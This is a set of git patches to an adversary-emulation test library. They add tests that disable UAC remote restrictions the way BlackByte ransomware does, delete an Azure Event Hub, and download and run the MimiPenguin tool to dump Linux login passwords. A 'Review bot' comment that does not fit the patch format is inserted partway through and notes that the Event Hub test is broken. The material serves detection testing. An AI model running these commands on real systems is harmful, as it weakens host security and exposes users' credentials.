b/atomics/Indexes/Indexes-Markdown/index.md index 13ee0894..f6f7eabc 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -749,6 +749,7 @@ - Atomic Test #5: Javascript in registry [windows] - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows] - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows] + - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d4fc8630..5a6fc548 100644 
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -518,6 +518,7 @@ - Atomic Test #5: Javascript in registry [windows] - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows] - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows] + - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3e57761d..41480ad8 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -31591,6 +31591,30 @@ defense-evasion: reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1 name: command_prompt elevation_required: true + - name: BlackByte Ransomware Registry Changes - Powershell + auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d + description: | + This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ + The steps are as follows: +
    +
  1. 1. Elevate Local Privilege by disabling UAC Remote Restrictions
  2. +
  3. 2. Enable OS to share network connections between different privilege levels
  4. +
  5. 3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths
  6. +
+ The registry keys and their respective values will be created upon successful execution. + supported_platforms: + - windows + executor: + command: | + New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force + New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force + New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force + cleanup_command: | + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force + Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force + name: powershell + elevation_required: true T1601: technique: external_references: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 44587434..bdc6033e 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -24,6 +24,8 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd) +- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell) +
@@ -291,4 +293,47 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled +
+
+ +## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell +This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ +The steps are as follows: +
    +
  1. 1. Elevate Local Privilege by disabling UAC Remote Restrictions
  2. +
  3. 2. Enable OS to share network connections between different privilege levels
  4. +
  5. 3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths
  6. +
+The registry keys and their respective values will be created upon successful execution. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force +New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force +New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force +``` + +#### Cleanup Commands: +```powershell +Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force +Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force +Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force +``` + + + + +
From 42dd141032f2e60c4292e5942fd97dd39af59581 Mon Sep 17 00:00:00 2001 From: SecWilson <47117894+SecWilson@users.noreply.github.com> Date: Mon, 7 Mar 2022 19:32:31 -0600 Subject: [PATCH 15/83] Fixing Blackbyte Cleanup Commands (#1802) Co-authored-by: Wilson --- atomics/T1112/T1112.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 0f10ccb5..22f0acff 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -127,9 +127,9 @@ atomic_tests: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f cleanup_command: | - reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1 - reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1 - reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1 + reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1 + reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1 + reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1 name: command_prompt elevation_required: true - name: BlackByte Ransomware Registry Changes - Powershell 
@@ -151,8 +151,8 @@ atomic_tests: New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force - Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force - Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore name: powershell elevation_required: true From 6052b5118a647d336e4c814feb40e73e6b21177f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 8 Mar 2022 01:33:09 +0000 Subject: [PATCH 16/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++++------ atomics/T1112/T1112.md | 12 ++++++------ 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 41480ad8..e1077627 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -31586,9 +31586,9 @@ defense-evasion: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f cleanup_command: | - reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1 - reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1 - reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1 + reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1 + reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1 + reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1 name: command_prompt elevation_required: true - name: BlackByte Ransomware Registry Changes - Powershell 
@@ -31610,9 +31610,9 @@ defense-evasion: New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force - Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force - Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore name: powershell elevation_required: true T1601: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index bdc6033e..7c1dfe05 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md 
@@ -284,9 +284,9 @@ cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPaths #### Cleanup Commands: ```cmd -reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1 -reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1 -reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1 +reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1 +reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1 +reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1 ``` @@ -327,9 +327,9 @@ New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongP #### Cleanup Commands: ```powershell -Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force +Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore +Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore +Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore ``` From af719c41d24bf2d3d773802bb37478c1735ec769 Mon Sep 17 00:00:00 2001 
From: Araveti Esanya Reddy Date: Tue, 8 Mar 2022 17:57:22 +0530 Subject: [PATCH 17/83] udpated azure eventhub deletion scenario --- atomics/T1562.001/T1562.001.yaml | 50 +++++++++++++++++++++++++++++++- 1 file changed, 49 insertions(+), 1 deletion(-) diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 8421e1e0..947889a3 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml 
@@ -573,4 +573,52 @@ atomic_tests: cleanup_command: | cmd /c #{DefenderControlExe} /E | Out-Null name: powershell - elevation_required: true + elevation_required: true +- name: Azure-Defense-Evasion-Eventhub-Deletion + auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719 + description: | + Identifies an Event Hub deletion in Azure + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure username + type: String + default: null + password: + description: Azure password + type: String + default: null + event_hub_name: + description: Name of the eventhub + type: String + default: "test_eventhub" + resource_group: + description: Name of the resource group + type: String + default: null + name_space_name: + description: Name of the NameSpace + type: String + default: null + dependency_executor_name: powershell + dependencies: + - description: | + Install-Module -Name Az + prereq_command: | + try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-AzureAD -Credential $creds + New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} + cleanup_command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-AzureAD -Credential $creds + Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} + name: powershell + elevation_required: false From 5148b9db57d15cdbfa6d505fba42f9efc5aa74d6 Mon Sep 17 00:00:00 2001 
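Review bot: The executor in this hunk runs `New-AzEventHub` and only the cleanup runs `Remove-AzEventHub`, so the Event Hub deletion that the test name and description announce happens during cleanup rather than as the attack step; presumably the two cmdlets are swapped. The session is also established with `Connect-AzureAD`, which signs in the AzureAD module, while `New-AzEventHub`/`Remove-AzEventHub` are Az cmdlets that need an Az context from `Connect-AzAccount -Credential $creds`; the dependency block has the same mismatch, describing `Install-Module -Name Az` but checking for and installing AzureAD. As written, a successful run produces no Event Hub deletion in the Activity Log, so any detection validated with this test is validated against nothing. The rewritten dependency and executor lines are below; the credential construction is unchanged.
```yaml
  dependencies:
  - description: |
      Az.EventHub module must be installed
    prereq_command: |
      try {if (Get-InstalledModule -Name Az.EventHub -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
    get_prereq_command: |
      Install-Module -Name Az.EventHub -Force
  executor:
    command: |
      # … unchanged: $secure_pwd / $creds construction …
      Connect-AzAccount -Credential $creds
      Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
    cleanup_command: |
      # … unchanged: $secure_pwd / $creds construction …
      Connect-AzAccount -Credential $creds
      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
```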
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Wed, 9 Mar 2022 10:15:17 -0600 Subject: [PATCH 18/83] Adding T1003.007 Test 3 - MimiPenguin Usage (#1804) Adding T1003.007 Test 3 - Capture Passwords with MimiPenguin. This test is designed to run the MimiPenguin script, which takes advantage of a vulnerability in Ubuntu-based distros, as well as certain versions of GNOME Keyring, in order to capture passwords in cleartext. Upon successful execution, user passwords will be exported to a file and displayed on-screen. --- atomics/T1003.007/T1003.007.yaml | 53 ++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index fbadc564..3f656755 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml 
@@ -104,3 +104,56 @@ atomic_tests: grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" +- name: Capture Passwords with MimiPenguin + description: | + MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). + Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. + See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. + See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007Test3.txt + MimiPenguin_Location: + description: Path of MimiPenguin script + type: Path + default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh + dependency_executor_name: sh + dependencies: + - description: | + MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location}) + prereq_command: | + if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz + mkdir /tmp/mimipenguin + tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin + - description: | + Strings must be installed + prereq_command: | + if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + sudo apt-get -y install binutils + - description: | + Python2 must be installed + prereq_command: | + if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + sudo apt-get -y install python2 + - description: | + Libc-bin must be installed + prereq_command: | + if [ -x 
"$(command -v ldd --version)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + sudo apt-get -y install libc-bin + executor: + command: | + sudo #{MimiPenguin_Location} > #{output_file} + cat #{output_file} + cleanup_command: | + rm -f #{output_file} > /dev/null + name: bash + elevation_required: true From 455cd5837eb9dca5d53045788adb2b6ecae1434a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 9 Mar 2022 16:15:58 +0000 Subject: [PATCH 19/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.007/T1003.007.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index 3f656755..a5bcee80 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -105,6 +105,7 @@ atomic_tests: cleanup_command: | rm -f "#{output_file}" - name: Capture Passwords with MimiPenguin + auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c description: | MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 5c8dfb49..7a3a3bc4 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -883,3 +883,4 @@ e895677d-4f06-49ab-91b6-ae3742d0a2ba 35eb8d16-9820-4423-a2a1-90c4f5edd9ca 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 0b79c06f-c788-44a2-8630-d69051f1123d +a27418de-bdce-4ebd-b655-38f04842bf0c From 82df99e7c8addd8620d5ecbb1ca38b594bd28d8f Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Mar 2022 16:16:04 +0000 Subject: [PATCH 20/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/index.yaml | 67 +++++++++++++++ atomics/T1003.007/T1003.007.md | 85 +++++++++++++++++++ 6 files changed, 156 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1e582b39..0a6f7538 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh +credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 437ccce7..525ea1fa 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv 
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh +credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f6f7eabc..253ca895 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -146,6 +146,7 @@ - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - Atomic Test #2: Dump individual process memory with Python (Local) [linux] + - Atomic Test #3: Capture Passwords with MimiPenguin [linux] - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md) - Atomic Test #1: Golden SAML [azure-ad] - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 130436db..a467540a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -54,6 +54,7 @@ - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - Atomic Test #2: Dump individual process memory with Python (Local) [linux] + - Atomic Test #3: Capture Passwords with MimiPenguin [linux] - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md) - Atomic Test #1: Golden SAML [azure-ad] - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e1077627..26376790 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -6299,6 +6299,73 @@ credential-access: cleanup_command: 'rm -f "#{output_file}" ' + - name: Capture Passwords with MimiPenguin + auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c + description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux + systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions + of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin + will retrieve passwords from memory and output them to a specified file. \nSee + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007Test3.txt" + MimiPenguin_Location: + description: Path of MimiPenguin script + type: Path + default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" + dependency_executor_name: sh + dependencies: + - description: 'MimiPenguin script must exist on disk at specified location + (#{MimiPenguin_Location}) + +' + prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz + mkdir /tmp/mimipenguin + tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin + - description: 'Strings must be installed + +' + prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: 'sudo apt-get -y install binutils + +' + - description: 'Python2 must be installed + +' + prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install python2 \n" + - 
description: 'Libc-bin must be installed + +' + prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else + exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install libc-bin \n" + executor: + command: | + sudo #{MimiPenguin_Location} > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} > /dev/null + +' + name: bash + elevation_required: true T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index d2d5875d..c07b000b 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) +- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin) +
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed" +
+
